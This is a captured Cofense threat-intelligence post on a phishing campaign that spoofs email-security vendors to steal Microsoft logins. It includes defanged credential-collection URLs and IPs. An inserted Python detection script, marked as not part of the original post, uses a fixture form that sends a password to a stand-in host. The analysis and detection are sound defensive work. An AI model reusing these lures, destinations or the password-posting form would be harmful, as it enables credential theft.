cofense.com
141.193.213.20

URL: https://cofense.com/blog/threat-actors-impersonate-email-security-providers-to-steal-user-credentials/
Submission: On May 18 via api from TR — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

THREAT ACTORS IMPERSONATE EMAIL SECURITY PROVIDERS TO STEAL USER CREDENTIALS

 * May 17, 2023


SEGs Bypassed: Microsoft, Trend Micro, IronPort

By Shirish Lavania, Cofense Phishing Defense Center

Today, every organization uses email security to protect its infrastructure,
because email is a common entry point for attackers spreading phishing, malware
and other types of threats. Adversaries, in turn, continuously try to bypass
secure email gateways (SEGs) to carry out their attacks. Threat actors often
disguise harmful URLs within HTML attachments, which makes it more challenging
for SEGs to block them. The Phishing Defense Center (PDC) analyzed a phishing
campaign impersonating email security providers to lure recipients into
providing their user credentials via a malicious HTML attachment.



Figure 1: Email Body

Figure 1 shows that the user received an email from “Forta”, which is likely a
misspelling of Fortra. The subject mentions an “essential encrypted company
email” and a fake green banner states that the “sender is verified”, in an
attempt to trick the user into clicking on the attachment. The email instructs
the user to authenticate with credentials in order to view the secure attached
document.



Figure 2: HTML File

The adversaries tried to make the attachment look legitimate by naming the HTML
file “Secure_FortraATT_2736614.html”, which is inside the “Attachment.zip”
archive, as seen in Figure 2.



Figure 3: Email Body

In Figure 3 we see a similarly styled email that shows Fortra as the sender but
makes mention of Proofpoint. The attacker tried to create a false sense of
security by including the footer “Secured by Proofpoint encryption”.

It is not uncommon for threat actors to use impersonation tactics to trick
users into believing that an email is genuine.

Once the user clicks on the attachment, it presents a spoofed Microsoft login
page carrying a Microsoft logo to make it look more familiar to the user, as
seen in Figure 4.



Figure 4: Fake Microsoft Landing Page

In Figure 5, the threat actor styled the spoofed page as if it were a
production login page.



Figure 5: Fake Production Login Page

Once users log in, the credentials are exfiltrated to the malicious URLs
hxxps://office[.]topexecs[.]info/ for Figure 4 and
hxxps//library-query[.]info/login[.]php for Figure 5.

This campaign shows that attackers are constantly improving their techniques
to lure users and bypass security measures in order to steal useful
information. Unfortunately, security solutions such as SEGs may not always be
effective in stopping attachment threats, and users end up opening them. An
attentive user alerted us to this campaign with the help of Cofense Reporter
upon realizing that the phishing email was asking for sensitive information.
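
One way to triage zipped HTML attachments like those described above, as an added example that is not part of the original post: it flags HTML members that contain a password field and reference a remote host, and reports those hosts defanged. It assumes the destination URL sits in plain markup or inline script; `LoginFormFinder`, `triage_zip`, `build_sample_zip` and the host `collector.example` are illustrative names.

```python
import io
import re
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

class LoginFormFinder(HTMLParser):
    """Counts password inputs and collects hosts the page could send data to."""
    def __init__(self):
        super().__init__()
        self.password_inputs, self.hosts = 0, set()

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.password_inputs += 1
        for name in ("action", "src", "href"):
            self._note(attrs.get(name) or "")

    def handle_data(self, data):  # also receives inline <script> text
        for url in re.findall(r"https?://[^\s'\"<>)]+", data):
            self._note(url)

    def _note(self, url):
        try:
            host = urlparse(url).hostname
        except ValueError:  # malformed URL, e.g. unbalanced brackets
            return
        if host:
            self.hosts.add(host.replace(".", "[.]"))  # keep output defanged

def triage_zip(zip_bytes):
    """Return {member: [defanged hosts]} for HTML members that ask for a password."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith((".html", ".htm")):
                finder = LoginFormFinder()
                finder.feed(zf.read(name).decode("utf-8", errors="replace"))
                if finder.password_inputs and finder.hosts:
                    findings[name] = sorted(finder.hosts)
    return findings

def build_sample_zip():
    # Constructed sample, not campaign data: a password form posting off-host.
    html = '<form action="https://collector.example/login.php"><input type="password"></form>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Secure_Doc_0001.html", html)
    return buf.getvalue()
```

This is a static check on readable markup; an attachment that encodes or builds its URL at run time would need to be rendered in a sandbox before the same test applies.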

Indicators of Compromise                      IP
hxxps//library-query[.]info/login[.]php       138.201.134.162
hxxps://office[.]topexecs[.]info/             84.247.51.110
                                              74.119.239.234

